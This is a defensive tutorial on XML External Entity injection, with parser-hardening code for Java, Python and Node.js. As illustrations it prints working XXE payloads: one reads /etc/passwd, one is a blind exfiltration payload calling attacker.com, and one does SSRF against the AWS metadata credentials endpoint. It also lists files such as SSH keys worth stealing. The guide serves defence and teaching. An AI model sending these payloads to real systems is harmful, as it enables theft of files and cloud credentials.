XXE Injection Prevention: Stopping XML External Entity Attacks

XML External Entity (XXE) injection is a critical server-side vulnerability that exploits weakly configured XML parsers. When an application parses XML input without disabling external entity processing, an attacker can use specially crafted XML to read arbitrary files from the server, trigger server-side request forgery (SSRF), or in some cases achieve remote code execution. Despite being well-understood, XXE continues to appear in enterprise applications, APIs, and document processing pipelines.

How XXE Works

XML supports a feature called external entities — references to resources outside the document itself. A standard XML document with an external entity looks like this:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>
  <data>&xxe;</data>
</root>

When the XML parser processes this document and external entity resolution is enabled, it replaces &xxe; with the contents of /etc/passwd. The application then reflects or stores that content, and the attacker has successfully read a sensitive file.

The attack surface is wider than most developers realize. Any endpoint that accepts XML — SOAP APIs, file upload features (docx, xlsx, svg), RSS/Atom parsers, and configuration imports — is potentially vulnerable.

File Read via XXE

The most common XXE payload targets the local filesystem. Common targets include:

/etc/passwd — list of system users
/etc/shadow — hashed passwords (if readable)
~/.ssh/id_rsa — private SSH keys
Application source code and configuration files containing database credentials

On Windows systems, attackers swap Unix paths for Windows equivalents like C:\Windows\win.ini or C:\inetpub\wwwroot\web.config.

A more subtle variation called blind XXE uses out-of-band channels to exfiltrate data when the application does not directly reflect parsed content:

<!DOCTYPE foo [
  <!ENTITY % file SYSTEM "file:///etc/passwd">
  <!ENTITY % dtd SYSTEM "http://attacker.com/exfil.dtd">
  %dtd;
]>

The external DTD on the attacker's server then chains parameter entities to send the file contents as an HTTP query string to a server the attacker controls.

SSRF via XXE

XXE is not limited to the local filesystem. By changing the SYSTEM URI to an http:// URL, attackers can force the XML parser to make HTTP requests on behalf of the server:

<!DOCTYPE foo [
  <!ENTITY ssrf SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">
]>
<root><data>&ssrf;</data></root>

This payload targets the AWS EC2 Instance Metadata Service (IMDS), returning IAM role credentials that grant access to AWS APIs. In internal networks, the same technique allows attackers to scan internal ports, hit internal APIs, and pivot to services that are not exposed publicly.

Disabling External Entities in Java

Java's standard XML APIs are vulnerable by default. The fix is to explicitly disable external entity processing and DTD loading on every parser you instantiate.

For DocumentBuilderFactory:

DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
factory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
factory.setXIncludeAware(false);
factory.setExpandEntityReferences(false);
DocumentBuilder builder = factory.newDocumentBuilder();

For SAXParserFactory:

SAXParserFactory spf = SAXParserFactory.newInstance();
spf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
spf.setFeature("http://xml.org/sax/features/external-general-entities", false);
spf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);

The safest single setting is disallow-doctype-decl. If your application never needs to process DOCTYPE declarations, this one flag blocks all XXE attack vectors.

Disabling External Entities in Python

Python's xml.etree.ElementTree is safe by default in Python 3.8+ — it raises an XMLParser error when it encounters external entity references. However, lxml and older libraries require explicit configuration.

Using defusedxml (recommended):

import defusedxml.ElementTree as ET

tree = ET.parse("input.xml")
root = tree.getroot()

defusedxml is a drop-in replacement for the standard library's XML modules. It disables all entity expansion, DTD loading, and external resource fetching by raising exceptions on any dangerous construct.

Hardening lxml directly:

from lxml import etree

parser = etree.XMLParser(
    resolve_entities=False,
    no_network=True,
    load_dtd=False
)
tree = etree.parse("input.xml", parser)

Never use etree.fromstring() or etree.parse() without a hardened parser when processing untrusted input.

Disabling External Entities in Node.js

Node.js applications that process XML typically rely on packages like xml2js, fast-xml-parser, or libxmljs.

xml2js does not support external entities natively and is safe by default for most use cases, but it parses <!DOCTYPE> declarations. Pass strict options when handling untrusted input:

const xml2js = require('xml2js');

const parser = new xml2js.Parser({
  explicitArray: false,
  xmlns: false,
});

fast-xml-parser is safe by default and does not resolve external entities. Always verify the version you're using and pin dependencies.

libxmljs2 requires explicit configuration:

const libxml = require('libxmljs2');

const doc = libxml.parseXml(xmlString, {
  noent: false,   // disable entity substitution
  dtdload: false, // do not load external DTDs
  nonet: true,    // block network access during parsing
});

Additional Defenses

Input validation and schema enforcement

If your application only needs to accept a specific XML structure, validate incoming documents against a strict XML Schema (XSD) before parsing. Reject any document that does not match the expected schema.

Replace XML with JSON

For new APIs and data exchange formats, prefer JSON. JSON has no concept of external entities or DTDs, eliminating this entire attack class. SOAP and legacy enterprise integrations are the main places where XML is unavoidable.

WAF rules

Web Application Firewalls can detect and block common XXE payloads by matching patterns like SYSTEM, ENTITY, and DOCTYPE in request bodies. WAF rules are a useful defense-in-depth layer but should not be the primary control — a determined attacker can encode or obfuscate payloads to bypass pattern matching.

Least-privilege for the application process

Even if an attacker successfully exploits XXE, a process running as a low-privilege user with restricted filesystem access limits how much damage can be done. Run application servers as dedicated users with no read access to sensitive system files or credential stores.

Testing for XXE

Include XXE testing in every security review of XML-processing code. The OWASP Testing Guide and tools like Burp Suite's active scanner include XXE detection. For CI/CD pipelines, static analysis tools (Semgrep, Checkmarx) can flag XML parser instantiation without security features enabled.

The single most effective fix is to disable external entity processing at the parser level. Apply it universally across your codebase, not just on endpoints you currently believe to be vulnerable.